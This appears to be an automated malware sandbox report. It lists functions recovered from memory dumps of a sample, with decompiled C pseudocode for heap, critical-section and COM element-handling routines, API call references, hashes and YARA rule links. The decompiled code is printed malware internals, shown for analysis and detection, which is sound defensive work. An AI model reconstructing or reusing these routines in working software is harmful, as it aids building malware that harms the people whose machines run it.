                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                  • String ID: ($\
                                                                                                                                  • API String ID: 3924217599-1512714803
                                                                                                                                  • Opcode ID: 7ee7cfee9ff99b9a664cb2e7bf7eb714d5bac6c6c9cb08a64d09ab9964154343
                                                                                                                                  • Instruction ID: fbee34389d8f7b49d24ff1c3f09e16aef523d3c1685bf82537652f85facb847b
                                                                                                                                  • Opcode Fuzzy Hash: 7ee7cfee9ff99b9a664cb2e7bf7eb714d5bac6c6c9cb08a64d09ab9964154343
                                                                                                                                  • Instruction Fuzzy Hash: 6F515D7A100E09AFDF26EF68DC40EAA77BAFF0C302F149914FA159A520D731D956DB20
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8FE031, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 2204710431-1686923651
                                                                                                                                  • Opcode ID: 9d4bcbeb06d206b8713bd4c3b54ca893d0ddde55cad070fc19330a0dd95971b4
                                                                                                                                  • Instruction ID: 5432ddae9369842a7e26f9663d4ef6ea3061af4ab918a544d97c6a3d04249322
                                                                                                                                  • Opcode Fuzzy Hash: 9d4bcbeb06d206b8713bd4c3b54ca893d0ddde55cad070fc19330a0dd95971b4
                                                                                                                                  • Instruction Fuzzy Hash: 72217FB1904A96AFDB21CFB8849076BBEECAF18254F044E1EE459C7A41E734D602CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A4B98, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E031A4B98() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x31ad364; // 0x5bd95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x31ad364; // 0x5bd95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x31ad364; // 0x5bd95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x31ae823) {
					HeapFree( *0x31ad270, 0, _t10);
					_t7 =  *0x31ad364; // 0x5bd95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                                                                                                  0x031a4b98
                                                                                                                                  0x031a4ba1
                                                                                                                                  0x031a4bb1
                                                                                                                                  0x031a4bb1
                                                                                                                                  0x031a4bb6
                                                                                                                                  0x031a4bbb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4bab
                                                                                                                                  0x031a4bab
                                                                                                                                  0x031a4bbd
                                                                                                                                  0x031a4bc2
                                                                                                                                  0x031a4bc6
                                                                                                                                  0x031a4bd9
                                                                                                                                  0x031a4bdf
                                                                                                                                  0x031a4bdf
                                                                                                                                  0x031a4be8
                                                                                                                                  0x031a4bea
                                                                                                                                  0x031a4bee
                                                                                                                                  0x031a4bf4

                                                                                                                                  APIs
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(05BD9570), ref: 031A4BA1
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,031A5390), ref: 031A4BAB
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,031A5390), ref: 031A4BD9
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(05BD9570), ref: 031A4BEE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 58946197-8415677
                                                                                                                                  • Opcode ID: 59879399f099a70f4831df3c8357579515678a1d88963dfa4303bb1769ffad6a
                                                                                                                                  • Instruction ID: 3ca0db9768e5d38d0e68a286d1b18eb77513e70fc8ca8ea181c3f877dcd8585d
                                                                                                                                  • Opcode Fuzzy Hash: 59879399f099a70f4831df3c8357579515678a1d88963dfa4303bb1769ffad6a
                                                                                                                                  • Instruction Fuzzy Hash: 93F0DABC604E00AFEB1CEB69EA69F1637E4BB4D303B054019E502D7754DB70A880DA70
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E92FF15, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$InformationTimeZone
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 597776487-0
                                                                                                                                  • Opcode ID: 2525265a8903948deb8fe8377bf5de155e90388b3dbb5dc1fea4b5f2201ae055
                                                                                                                                  • Instruction ID: 40db86d213b3e28abae1ab7155b046fa1296401fb8678ee60d0cc2525e22bb79
                                                                                                                                  • Opcode Fuzzy Hash: 2525265a8903948deb8fe8377bf5de155e90388b3dbb5dc1fea4b5f2201ae055
                                                                                                                                  • Instruction Fuzzy Hash: AEC126719142259FDB108FF88850BEE7BBEAF96358F344969D490AB285F731CA42CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E932B27, Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                  • Opcode ID: 3a2a9ffbba49252ecc00564889112a80e9954c9ae6f56eb0d11fbc6cc8e3ddcb
                                                                                                                                  • Instruction ID: 82f023b999c3dbb32c2ab1f495dcb7a8f1f98f948c5c582d9c68e0e3c7da7879
                                                                                                                                  • Opcode Fuzzy Hash: 3a2a9ffbba49252ecc00564889112a80e9954c9ae6f56eb0d11fbc6cc8e3ddcb
                                                                                                                                  • Instruction Fuzzy Hash: C951E532A00715AFEB10DFAAC880AAA77F8FF59714F244969E815DB250E731D901CF80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8FE244, Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MaklocchrMaklocstr$H_prolog3_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2404127365-0
                                                                                                                                  • Opcode ID: 553052bb9a527c4a483356c8188f8bd8eb366442fb42275b7b9b83cdb0162acf
                                                                                                                                  • Instruction ID: 9d9f6c3f39ee678dd2dadd4c07138d11817211271ce1b65009b54289335904b0
                                                                                                                                  • Opcode Fuzzy Hash: 553052bb9a527c4a483356c8188f8bd8eb366442fb42275b7b9b83cdb0162acf
                                                                                                                                  • Instruction Fuzzy Hash: BE2125B1C00348EFDB14DFE5D8849DABBB8AF84714F00895AE9159F255EB70DA41CFA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F67FA, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocstr$Maklocchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2020259771-0
                                                                                                                                  • Opcode ID: 2833313188859c668e58f4cf59359ed7e4d85d9231e0e25294733c2f7c2fcab2
                                                                                                                                  • Instruction ID: 877c5e5175563c59976a1fc4e5f63ef5d0250026fd5787aa7b6c7256552b63e9
                                                                                                                                  • Opcode Fuzzy Hash: 2833313188859c668e58f4cf59359ed7e4d85d9231e0e25294733c2f7c2fcab2
                                                                                                                                  • Instruction Fuzzy Hash: CB116DB1960745FFE6208BE99840B52B7ECAF04694F048E2AF2448B640D365F95197E4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93CEE5, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6E93CEFD
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93CF0F
                                                                                                                                  • _free.LIBCMT ref: 6E93CF21
                                                                                                                                  • _free.LIBCMT ref: 6E93CF33
                                                                                                                                  • _free.LIBCMT ref: 6E93CF45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 18da560f28fd09a14ca3f854e1c34fd2ec7704841c61a228db5dd80ea5b4ff81
                                                                                                                                  • Instruction ID: 6317e2dcd4c17c898ec34a8ae09e7dc21c832c8673b0bc5dcaf0d10dc1b83b76
                                                                                                                                  • Opcode Fuzzy Hash: 18da560f28fd09a14ca3f854e1c34fd2ec7704841c61a228db5dd80ea5b4ff81
                                                                                                                                  • Instruction Fuzzy Hash: CDF06D35509E34ABCA40DBDAE488DDB37EDAF42614BB84C05F018DB601CB30F8C48EA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8E6020, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 183COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Smanip$task
                                                                                                                                  • String ID: .
                                                                                                                                  • API String ID: 1925983085-248832578
                                                                                                                                  • Opcode ID: a65e16cce39e5dae10fafb00ba16f26399d7800388a94bfdd3592628b3517f70
                                                                                                                                  • Instruction ID: 11973df3d927521aebf228c1b77d65fb753f2ca8bfa0d7065b47be3915b1b248
                                                                                                                                  • Opcode Fuzzy Hash: a65e16cce39e5dae10fafb00ba16f26399d7800388a94bfdd3592628b3517f70
                                                                                                                                  • Instruction Fuzzy Hash: FF8139B1904628DFCF08CF98CA90EEA77B5FF57304F108959D206A7684D7B4AA4CDB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A577D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                  			E031A577D(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x31ad380; // 0x5bd9b28
				_push(0x800);
				_push(0);
				_push( *0x31ad270);
				if( *0x31ad284 >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x31ad284 =  *0x31ad284 + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E031A789B(_t44, _t40);
						_t18 = E031A3720(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x31ad284 < 5) {
								 *0x31ad284 =  *0x31ad284 & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E031A47D5();
						HeapFree( *0x31ad270, 0, _t40);
						goto L10;
					}
					_t24 = E031A44A4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E031A6109(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}











                                                                                                                                  0x031a577d
                                                                                                                                  0x031a577d
                                                                                                                                  0x031a5780
                                                                                                                                  0x031a5781
                                                                                                                                  0x031a578b
                                                                                                                                  0x031a5792
                                                                                                                                  0x031a5797
                                                                                                                                  0x031a5799
                                                                                                                                  0x031a579f
                                                                                                                                  0x031a57c7
                                                                                                                                  0x031a57df
                                                                                                                                  0x031a57e1
                                                                                                                                  0x031a57e2
                                                                                                                                  0x031a57e4
                                                                                                                                  0x031a5822
                                                                                                                                  0x031a5822
                                                                                                                                  0x031a5828
                                                                                                                                  0x031a582e
                                                                                                                                  0x031a582e
                                                                                                                                  0x031a57e6
                                                                                                                                  0x031a57ec
                                                                                                                                  0x031a57ef
                                                                                                                                  0x031a57fe
                                                                                                                                  0x031a5800
                                                                                                                                  0x031a5807
                                                                                                                                  0x031a583b
                                                                                                                                  0x031a5840
                                                                                                                                  0x031a5842
                                                                                                                                  0x031a5844
                                                                                                                                  0x031a5844
                                                                                                                                  0x00000000
                                                                                                                                  0x031a5842
                                                                                                                                  0x031a5809
                                                                                                                                  0x031a580e
                                                                                                                                  0x031a581c
                                                                                                                                  0x00000000
                                                                                                                                  0x031a581c
                                                                                                                                  0x031a57d6
                                                                                                                                  0x031a57db
                                                                                                                                  0x031a57db
                                                                                                                                  0x00000000
                                                                                                                                  0x031a57db
                                                                                                                                  0x031a57a9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a57b8
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 031A57A1
                                                                                                                                    • Part of subcall function 031A6109: GetTickCount.KERNEL32 ref: 031A611D
                                                                                                                                    • Part of subcall function 031A6109: wsprintfA.USER32 ref: 031A616D
                                                                                                                                    • Part of subcall function 031A6109: wsprintfA.USER32 ref: 031A618A
                                                                                                                                    • Part of subcall function 031A6109: wsprintfA.USER32 ref: 031A61B6
                                                                                                                                    • Part of subcall function 031A6109: HeapFree.KERNEL32(00000000,?), ref: 031A61C8
                                                                                                                                    • Part of subcall function 031A6109: wsprintfA.USER32 ref: 031A61E9
                                                                                                                                    • Part of subcall function 031A6109: HeapFree.KERNEL32(00000000,?), ref: 031A61F9
                                                                                                                                    • Part of subcall function 031A6109: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 031A6227
                                                                                                                                    • Part of subcall function 031A6109: GetTickCount.KERNEL32 ref: 031A6238
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 031A57BF
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000002,031A553A,?,031A553A,00000002,?,?,031A53C9,?), ref: 031A581C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 1676223858-8415677
                                                                                                                                  • Opcode ID: fd3803592e50afd22b093e8c11455208aaca639c5a87edcd05490b26bf4a00dc
                                                                                                                                  • Instruction ID: 38ea9d3235050095aa2563f45de79d394fd5d3e58f0b76eef686ae707ace3200
                                                                                                                                  • Opcode Fuzzy Hash: fd3803592e50afd22b093e8c11455208aaca639c5a87edcd05490b26bf4a00dc
                                                                                                                                  • Instruction Fuzzy Hash: 1821417A200A09EBCB05EFA9D994E9A37ADEB4D353F110016F942E7640DB70D945DBB0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8FDF66, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8FDF6D
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F681A
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F6837
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F6854
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocchr.LIBCPMT ref: 6E8F6866
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocchr.LIBCPMT ref: 6E8F6879
                                                                                                                                  • _Mpunct.LIBCPMT ref: 6E8FDFFA
                                                                                                                                  • _Mpunct.LIBCPMT ref: 6E8FE014
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 2939335142-1686923651
                                                                                                                                  • Opcode ID: d8f207b87671f4ab34ced7d3884fa331846cc4aed6e80496cf74008402f66db6
                                                                                                                                  • Instruction ID: 6dcc549fe59e99c9fe3fc5f3eba8f0bf9d81947785cd0296121c9bca1ad7a167
                                                                                                                                  • Opcode Fuzzy Hash: d8f207b87671f4ab34ced7d3884fa331846cc4aed6e80496cf74008402f66db6
                                                                                                                                  • Instruction Fuzzy Hash: E02171B1904B56AFD721CFB98450B7BBAECAF18258B040E1EA459C7A41D774D602CFD0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E906B83, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$H_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 4281374311-1686923651
                                                                                                                                  • Opcode ID: 96edfc0e45770f848c7d35f814d305d90dc15db41d8a1ded508af638e9c91fd9
                                                                                                                                  • Instruction ID: 3e96006575a0a05f8f3ff08aa6ed7046c1720db0e26f2fecf60b3499a05e8932
                                                                                                                                  • Opcode Fuzzy Hash: 96edfc0e45770f848c7d35f814d305d90dc15db41d8a1ded508af638e9c91fd9
                                                                                                                                  • Instruction Fuzzy Hash: 992183B1904B56AFD761CFB9845077BBEECAF18244F440A1EE499C7A41E734D642CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A5920, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                  			E031A5920(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x31ad2e0; // 0x2a2a5a8
					_t5 = _t103 + 0x31ae038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x31ac2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x31ad2e0; // 0x2a2a5a8
												_t28 = _t109 + 0x31ae0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x31ad2e0; // 0x2a2a5a8
														_t33 = _t79 + 0x31ae078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                                                                                                  0x031a5925
                                                                                                                                  0x031a592e
                                                                                                                                  0x031a592f
                                                                                                                                  0x031a5933
                                                                                                                                  0x031a5939
                                                                                                                                  0x031a593f
                                                                                                                                  0x031a5948
                                                                                                                                  0x031a594e
                                                                                                                                  0x031a5958
                                                                                                                                  0x031a595a
                                                                                                                                  0x031a5960
                                                                                                                                  0x031a5965
                                                                                                                                  0x031a5970
                                                                                                                                  0x031a5976
                                                                                                                                  0x031a597b
                                                                                                                                  0x031a5a9d
                                                                                                                                  0x031a5981
                                                                                                                                  0x031a5981
                                                                                                                                  0x031a598e
                                                                                                                                  0x031a5994
                                                                                                                                  0x031a599a
                                                                                                                                  0x031a599e
                                                                                                                                  0x031a59a4
                                                                                                                                  0x031a59b1
                                                                                                                                  0x031a59b5
                                                                                                                                  0x031a59bb
                                                                                                                                  0x031a59be
                                                                                                                                  0x031a59c6
                                                                                                                                  0x031a59c7
                                                                                                                                  0x031a59cb
                                                                                                                                  0x031a59cf
                                                                                                                                  0x031a59d2
                                                                                                                                  0x031a59d5
                                                                                                                                  0x031a59db
                                                                                                                                  0x031a59e4
                                                                                                                                  0x031a59ea
                                                                                                                                  0x031a59eb
                                                                                                                                  0x031a59ee
                                                                                                                                  0x031a59ef
                                                                                                                                  0x031a59f0
                                                                                                                                  0x031a59f8
                                                                                                                                  0x031a59f9
                                                                                                                                  0x031a59fa
                                                                                                                                  0x031a59fc
                                                                                                                                  0x031a5a00
                                                                                                                                  0x031a5a04
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a5a0a
                                                                                                                                  0x031a5a13
                                                                                                                                  0x031a5a19
                                                                                                                                  0x031a5a23
                                                                                                                                  0x031a5a27
                                                                                                                                  0x031a5a29
                                                                                                                                  0x031a5a36
                                                                                                                                  0x031a5a3a
                                                                                                                                  0x031a5a42
                                                                                                                                  0x031a5a47
                                                                                                                                  0x031a5a59
                                                                                                                                  0x031a5a5b
                                                                                                                                  0x031a5a61
                                                                                                                                  0x031a5a61
                                                                                                                                  0x031a5a6a
                                                                                                                                  0x031a5a6a
                                                                                                                                  0x031a5a6c
                                                                                                                                  0x031a5a72
                                                                                                                                  0x031a5a72
                                                                                                                                  0x031a5a75
                                                                                                                                  0x031a5a7b
                                                                                                                                  0x031a5a7e
                                                                                                                                  0x031a5a87
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a5a87
                                                                                                                                  0x031a59db
                                                                                                                                  0x031a59d5
                                                                                                                                  0x031a59be
                                                                                                                                  0x031a5a8d
                                                                                                                                  0x031a5a8d
                                                                                                                                  0x031a5a93
                                                                                                                                  0x031a5a93
                                                                                                                                  0x031a5a99
                                                                                                                                  0x031a5a99
                                                                                                                                  0x031a5aa2
                                                                                                                                  0x031a5aa8
                                                                                                                                  0x031a5aa8
                                                                                                                                  0x031a5965
                                                                                                                                  0x031a5ab1

                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(031AC2B0), ref: 031A5970
                                                                                                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 031A5A51
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A5A6A
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 031A5A99
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Free$Alloclstrcmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1885612795-0
                                                                                                                                  • Opcode ID: 8188d7a4ffbbb144be4b84affb55701c2435caa3130b00a23f9909253a90e442
                                                                                                                                  • Instruction ID: bb18cac780cb99813f770f22bc0a3f92908153be0bdbd0ae8194dad3110bd91e
